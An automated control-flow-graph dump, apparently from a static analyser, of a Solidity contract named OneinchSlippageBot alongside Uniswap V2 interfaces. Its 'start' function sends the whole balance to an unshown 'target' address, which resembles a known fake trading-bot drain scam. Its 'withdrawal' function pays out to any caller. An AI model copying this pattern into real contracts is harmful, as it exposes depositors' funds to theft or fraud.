Contract: IUniswapV2ERC20
==================================================


Contract: IUniswapV2Factory
==================================================


Contract: IUniswapV2Pair
==================================================


Contract: OneinchSlippageBot
==================================================

Function: constructor
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: tokenSymbol = _mainTokenSymbol

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: tokenName = _mainTokenName

Edges:
  0 -> 1
  1 -> 2

Function: receive
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

Edges:

Function: findNewContracts
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: poolCount = IUniswapV2Factory(factory).allPairsLength()

  ID: 2
  Type: NodeType.VARIABLE
  Expression: newContracts = new address[](poolCount)

  ID: 3
  Type: NodeType.STARTLOOP
  Expression: 

  ID: 4
  Type: NodeType.ENDLOOP
  Expression: 

  ID: 5
  Type: NodeType.VARIABLE
  Expression: i = 0

  ID: 6
  Type: NodeType.IFLOOP
  Expression: i < poolCount

  ID: 7
  Type: NodeType.EXPRESSION
  Expression: newContracts[i] = IUniswapV2Factory(factory).allPairs(i)

  ID: 8
  Type: NodeType.EXPRESSION
  Expression: i ++

  ID: 9
  Type: NodeType.RETURN
  Expression: newContracts

Edges:
  0 -> 1
  1 -> 2
  2 -> 5
  3 -> 6
  4 -> 9
  5 -> 3
  6 -> 7
  6 -> 4
  7 -> 8
  8 -> 6

Function: loadCurrentContract
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(contractAddress != address(0),Invalid contract address)

  ID: 2
  Type: NodeType.RETURN
  Expression: contractAddress

Edges:
  0 -> 1
  1 -> 2

Function: findContracts
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.RETURN
  Expression: findNewContracts(factory)

Edges:
  0 -> 1

Function: start
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(target != address(0),Invalid address)

  ID: 2
  Type: NodeType.VARIABLE
  Expression: contracts = address(target)

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: contracts.transfer(address(this).balance)

Edges:
  0 -> 1
  1 -> 2
  2 -> 3

Function: withdrawal
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.VARIABLE
  Expression: owner = address(msg.sender)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: owner.transfer(address(this).balance)

Edges:
  0 -> 1
  1 -> 2

Function: getBalance
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.RETURN
  Expression: address(this).balance

Edges:
  0 -> 1


